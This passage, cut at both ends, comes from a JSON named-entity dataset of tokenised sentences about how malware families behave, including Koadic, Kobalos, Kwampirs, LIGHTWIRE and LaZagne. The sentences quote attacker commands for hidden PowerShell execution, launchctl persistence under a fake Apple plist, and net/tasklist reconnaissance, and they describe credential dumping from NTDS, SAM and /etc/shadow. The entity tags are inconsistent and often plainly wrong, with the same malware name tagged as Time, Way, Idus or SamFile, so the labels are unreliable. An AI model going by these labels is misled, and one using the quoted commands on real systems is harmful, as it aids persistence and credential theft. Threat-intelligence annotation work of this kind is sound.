[ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Koadic", - "can", - "download", - "files", - "off", - "the", - "target", - "system", - "to", - "send", - "back", - "to", - "the", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Koadic", - "can", - "perform", - "process", - "injection", - "by", - "using", - "a", - "reflective", - "DLL." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Koadic", - "can", - "obtain", - "a", - "list", - "of", - "directories." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Koadic", - "has", - "used", - "the", - "command", - "<code>Powershell.exe", - "-ExecutionPolicy", - "Bypass", - "-WindowStyle", - "Hidden</code>", - "to", - "hide", - "its", - "window." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Koadic", - "can", - "download", - "additional", - "files", - "and", - "tools." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Koadic", - "can", - "use", - "mshta", - "to", - "serve", - "additional", - "payloads", - "and", - "to", - "help", - "schedule", - "tasks", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Koadic", - "can", - "gather", - "hashed", - "passwords", - "by", - "gathering", - "domain", - "controller", - "hashes", - "from", - "NTDS." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Koadic", - "can", - "scan", - "for", - "open", - "TCP", - "ports", - "on", - "the", - "target", - "network." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Koadic", - "can", - "scan", - "local", - "network", - "for", - "open", - "SMB." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Koadic", - "has", - "used", - "PowerShell", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Koadic", - "has", - "added", - "persistence", - "to", - "the", - "`HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`", - "Registry", - "key." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Koadic", - "can", - "use", - "Regsvr32", - "to", - "execute", - "additional", - "payloads." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Koadic", - "can", - "enable", - "remote", - "desktop", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Koadic", - "can", - "use", - "Rundll32", - "to", - "execute", - "additional", - "payloads." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Koadic", - "has", - "used", - "scheduled", - "tasks", - "to", - "add", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Koadic", - "can", - "gather", - "hashed", - "passwords", - "by", - "dumping", - "SAM/SECURITY", - "hive." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Koadic", - "can", - "run", - "a", - "command", - "on", - "another", - "machine", - "using", - "PsExec." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Koadic", - "can", - "obtain", - "the", - "OS", - "version", - "and", - "build,", - "computer", - "name,", - "and", - "processor", - "architecture", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Koadic", - "can", - "retrieve", - "the", - "contents", - "of", - "the", - "IP", - "routing", - "table", - "as", - "well", - "as", - "information", - "about", - "the", - "Windows", - "domain." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Koadic", - "can", - "identify", - "logged", - "in", - "users", - "across", - "the", - "domain", - "and", - "views", - "user", - "sessions." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Koadic", - "performs", - "most", - "of", - "its", - "operations", - "using", - "Windows", - "Script", - "Host", - "(VBScript)", - "and", - "runs", - "arbitrary", - "shellcode", - "." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Koadic", - "has", - "used", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Koadic", - "can", - "open", - "an", - "interactive", - "command-shell", - "to", - "perform", - "command", - "line", - "functions", - "on", - "victim", - "machines.", - "Koadic", - "performs", - "most", - "of", - "its", - "operations", - "using", - "Windows", - "Script", - "Host", - "(Jscript)", - "and", - "to", - "run", - "arbitrary", - "shellcode." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "Koadic", - "can", - "use", - "WMI", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kobalos's", - "authentication", - "and", - "key", - "exchange", - "is", - "performed", - "using", - "RSA-512." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Kobalos", - "can", - "remove", - "all", - "command", - "history", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kobalos", - "replaced", - "the", - "SSH", - "client", - "with", - "a", - "trojanized", - "SSH", - "client", - "to", - "steal", - "credentials", - "on", - "compromised", - "systems." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kobalos", - "can", - "write", - "captured", - "SSH", - "connection", - "credentials", - "to", - "a", - "file", - "under", - "the", - "<code>/var/run</code>", - "directory", - "with", - "a", - "<code>.pid</code>", - "extension", - "for", - "exfiltration." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kobalos", - "decrypts", - "strings", - "right", - "after", - "the", - "initial", - "communication,", - "but", - "before", - "the", - "authentication", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kobalos", - "can", - "exfiltrate", - "credentials", - "over", - "the", - "network", - "via", - "UDP." - ], - "ner_tags": [ - "B-Tool", - "O", - "B-SamFile", - "B-Purp", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Kobalos", - "has", - "used", - "a", - "compromised", - "SSH", - "client", - "to", - "capture", - "the", - "hostname,", - "port,", - "username", - "and", - "password", - "used", - "to", - "establish", - "an", - "SSH", - "connection", - "from", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kobalos", - "can", - "chain", - "together", - "multiple", - "compromised", - "machines", - "as", - "proxies", - "to", - "reach", - "their", - "final", - "targets." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kobalos", - "encrypts", - "all", - "strings", - "using", - "RC4", - "and", - "bundles", - "all", - "functionality", - "into", - "a", - "single", - "function", - "call." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kobalos's", - "post-authentication", - "communication", - "channel", - "uses", - "a", - "32-byte-long", - "password", - "with", - "RC4", - "for", - "inbound", - "and", - "outbound", - "traffic." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kobalos", - "can", - "record", - "the", - "hostname", - "and", - "kernel", - "version", - "of", - "the", - "target", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kobalos", - "can", - "record", - "the", - "IP", - "address", - "of", - "the", - "target", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kobalos", - "can", - "modify", - "timestamps", - "of", - "replaced", - "files,", - "such", - "as", - "<code>ssh</code>", - "with", - "the", - "added", - "credential", - "stealer", - "or", - "<code>sshd</code>", - "used", - "to", - "deploy", - "Kobalos." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Kobalos", - "is", - "triggered", - "by", - "an", - "incoming", - "TCP", - "connection", - "to", - "a", - "legitimate", - "service", - "from", - "a", - "specific", - "source", - "port." - ], - "ner_tags": [ - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kobalos", - "can", - "spawn", - "a", - "new", - "pseudo-terminal", - "and", - "execute", - "arbitrary", - "commands", - "at", - "the", - "command", - "prompt." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Komplex", - "trojan", - "supports", - "file", - "deletion." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Komplex", - "payload", - "is", - "stored", - "in", - "a", - "hidden", - "directory", - "at", - "<code>/Users/Shared/.local/kextd</code>." - ], - "ner_tags": [ - "O", - "B-Way", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Komplex", - "trojan", - "creates", - "a", - "persistent", - "launch", - "agent", - "called", - "with", - "<code>$HOME/Library/LaunchAgents/com.apple.updates.plist</code>", - "with", - "<code>launchctl", - "load", - "-w", - "~/Library/LaunchAgents/com.apple.updates.plist</code>." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "OsInfo", - "function", - "in", - "Komplex", - "collects", - "a", - "running", - "process", - "list." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "B-Way", - "I-Features", - "I-Features", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "The", - "Komplex", - "C2", - "channel", - "uses", - "an", - "11-byte", - "XOR", - "algorithm", - "to", - "hide", - "data." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "OsInfo", - "function", - "in", - "Komplex", - "collects", - "the", - "current", - "running", - "username." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "B-Way", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Komplex", - "C2", - "channel", - "uses", - "HTTP", - "POST", - "requests." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Before", - "writing", - "to", - "disk,", - "Kwampirs", - "inserts", - "a", - "randomly", - "generated", - "string", - "into", - "the", - "middle", - "of", - "the", - "decrypted", - "payload", - "in", - "an", - "attempt", - "to", - "evade", - "hash-based", - "detections." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kwampirs", - "decrypts", - "and", - "extracts", - "a", - "copy", - "of", - "its", - "main", - "DLL", - "payload", - "when", - "executing." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kwampirs", - "collects", - "a", - "list", - "of", - "domain", - "groups", - "with", - "the", - "command", - "<code>net", - "localgroup", - "/domain</code>." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kwampirs", - "downloads", - "additional", - "files", - "that", - "are", - "base64-encoded", - "and", - "encrypted", - "with", - "another", - "cipher." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kwampirs", - "uses", - "a", - "large", - "list", - "of", - "C2", - "servers", - "that", - "it", - "cycles", - "through", - "until", - "a", - "successful", - "connection", - "is", - "established." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kwampirs", - "collects", - "a", - "list", - "of", - "files", - "and", - "directories", - "in", - "C:\\", - "with", - "the", - "command", - "<code>dir", - "/s", - "/a", - "c:\\", - ">>", - "\"C:\\windows\\TEMP\\[RANDOM].tmp\"</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Kwampirs", - "downloads", - "additional", - "files", - "from", - "C2", - "servers." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kwampirs", - "collects", - "a", - "list", - "of", - "accounts", - "with", - "the", - "command", - "<code>net", - "users</code>." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kwampirs", - "collects", - "a", - "list", - "of", - "users", - "belonging", - "to", - "the", - "local", - "users", - "and", - "administrators", - "groups", - "with", - "the", - "commands", - "<code>net", - "localgroup", - "administrators</code>", - "and", - "<code>net", - "localgroup", - "users</code>." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kwampirs", - "establishes", - "persistence", - "by", - "adding", - "a", - "new", - "service", - "with", - "the", - "display", - "name", - "\"WMI", - "Performance", - "Adapter", - "Extension\"", - "in", - "an", - "attempt", - "to", - "masquerade", - "as", - "a", - "legitimate", - "WMI", - "service." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kwampirs", - "collects", - "a", - "list", - "of", - "network", - "shares", - "with", - "the", - "command", - "<code>net", - "share</code>." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kwampirs", - "collects", - "password", - "policy", - "information", - "with", - "the", - "command", - "<code>net", - "accounts</code>." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kwampirs", - "collects", - "a", - "list", - "of", - "running", - "services", - "with", - "the", - "command", - "<code>tasklist", - "/v</code>." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kwampirs", - "collects", - "a", - "list", - "of", - "available", - "servers", - "with", - "the", - "command", - "<code>net", - "view</code>." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kwampirs", - "uses", - "rundll32.exe", - "in", - "a", - "Registry", - "value", - "added", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kwampirs", - "copies", - "itself", - "over", - "network", - "shares", - "to", - "move", - "laterally", - "on", - "a", - "victim", - "network." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kwampirs", - "collects", - "OS", - "version", - "information", - "such", - "as", - "registered", - "owner", - "details,", - "manufacturer", - "details,", - "processor", - "type,", - "available", - "storage,", - "installed", - "patches,", - "hostname,", - "version", - "info,", - "system", - "date,", - "and", - "other", - "system", - "information", - "by", - "using", - "the", - "commands", - "<code>systeminfo</code>,", - "<code>net", - "config", - "workstation</code>,", - "<code>hostname</code>,", - "<code>ver</code>,", - "<code>set</code>,", - "and", - "<code>date", - "/t</code>." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kwampirs", - "collects", - "network", - "adapter", - "and", - "interface", - "information", - "by", - "using", - "the", - "commands", - "<code>ipconfig", - "/all</code>,", - "<code>arp", - "-a</code>", - "and", - "<code>route", - "print</code>.", - "It", - "also", - "collects", - "the", - "system's", - "MAC", - "address", - "with", - "<code>getmac</code>", - "and", - "domain", - "configuration", - "with", - "<code>net", - "config", - "workstation</code>." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kwampirs", - "collects", - "a", - "list", - "of", - "active", - "and", - "listening", - "connections", - "by", - "using", - "the", - "command", - "<code>netstat", - "-nao</code>", - "as", - "well", - "as", - "a", - "list", - "of", - "available", - "network", - "mappings", - "with", - "<code>net", - "use</code>." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kwampirs", - "collects", - "registered", - "owner", - "details", - "by", - "using", - "the", - "commands", - "<code>systeminfo</code>", - "and", - "<code>net", - "config", - "workstation</code>." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kwampirs", - "collects", - "a", - "list", - "of", - "running", - "services", - "with", - "the", - "command", - "<code>tasklist", - "/svc</code>." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kwampirs", - "creates", - "a", - "new", - "service", - "named", - "WmiApSrvEx", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LIGHTWIRE", - "can", - "imbed", - "itself", - "into", - "the", - "legitimate", - "`compcheckresult.cgi`", - "component", - "of", - "Ivanti", - "Connect", - "Secure", - "VPNs", - "to", - "enable", - "command", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LIGHTWIRE", - "can", - "RC4", - "decrypt", - "and", - "Base64", - "decode", - "C2", - "commands." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "B-Features", - "O", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LIGHTWIRE", - "can", - "RC4", - "encrypt", - "C2", - "commands." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "B-HackOrg", - "O" - ] - }, - { - "tokens": [ - "LIGHTWIRE", - "can", - "use", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LIGHTWIRE", - "is", - "a", - "web", - "shell", - "capable", - "of", - "command", - "execution", - "and", - "establishing", - "persistence", - "on", - "compromised", - "Ivanti", - "Secure", - "Connect", - "VPNs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LITTLELAMB.WOOLTEA", - "can", - "communicate", - "over", - "SSL", - "using", - "the", - "private", - "key", - "from", - "the", - "Ivanti", - "Connect", - "Secure", - "web", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LITTLELAMB.WOOLTEA", - "can", - "append", - "malicious", - "components", - "to", - "the", - "`tmp/tmpmnt/bin/samba_upgrade.tar`", - "archive", - "inside", - "the", - "factory", - "reset", - "partition", - "in", - "attempt", - "to", - "persist", - "post", - "reset." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "B-Features", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LITTLELAMB.WOOLTEA", - "can", - "initialize", - "itself", - "as", - "a", - "daemon", - "to", - "run", - "persistently", - "in", - "the", - "background." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LITTLELAMB.WOOLTEA", - "can", - "monitor", - "for", - "system", - "upgrade", - "events", - "by", - "checking", - "for", - "the", - "presence", - "of", - "`/tmp/data/root/dev`." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "LITTLELAMB.WOOLTEA", - "can", - "function", - "as", - "a", - "stand-alone", - "backdoor", - "communicating", - "over", - "the", - "`/tmp/clientsDownload.sock`", - "socket." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "LITTLELAMB.WOOLTEA", - "has", - "the", - "ability", - "to", - "function", - "as", - "a", - "SOCKS", - "proxy." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "LITTLELAMB.WOOLTEA", - "can", - "check", - "the", - "type", - "of", - "Ivanti", - "VPN", - "device", - "it", - "is", - "running", - "on", - "by", - "executing", - "`first_run()`", - "to", - "identify", - "the", - "first", - "four", - "bytes", - "of", - "the", - "motherboard", - "serial", - "number." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LOWBALL", - "uses", - "the", - "Dropbox", - "cloud", - "storage", - "service", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LOWBALL", - "uses", - "the", - "Dropbox", - "API", - "to", - "request", - "two", - "files,", - "one", - "of", - "which", - "is", - "the", - "same", - "file", - "as", - "the", - "one", - "dropped", - "by", - "the", - "malicious", - "email", - "attachment.", - "This", - "is", - "most", - "likely", - "meant", - "to", - "be", - "a", - "mechanism", - "to", - "update", - "the", - "compromised", - "host", - "with", - "a", - "new", - "version", - "of", - "the", - "LOWBALL", - "malware." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "LOWBALL", - "command", - "and", - "control", - "occurs", - "via", - "HTTPS", - "over", - "port", - "443." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LaZagne", - "can", - "obtain", - "credential", - "information", - "from", - "/etc/shadow", - "using", - "the", - "shadow.py", - "module." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "LaZagne", - "can", - "perform", - "credential", - "dumping", - "from", - "MSCache", - "to", - "obtain", - "account", - "and", - "password", - "information." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LaZagne", - "can", - "obtain", - "credentials", - "from", - "chats,", - "databases,", - "mail,", - "and", - "WiFi." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "LaZagne", - "can", - "obtain", - "credentials", - "from", - "databases,", - "mail,", - "and", - "WiFi", - "across", - "multiple", - "platforms." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LaZagne", - 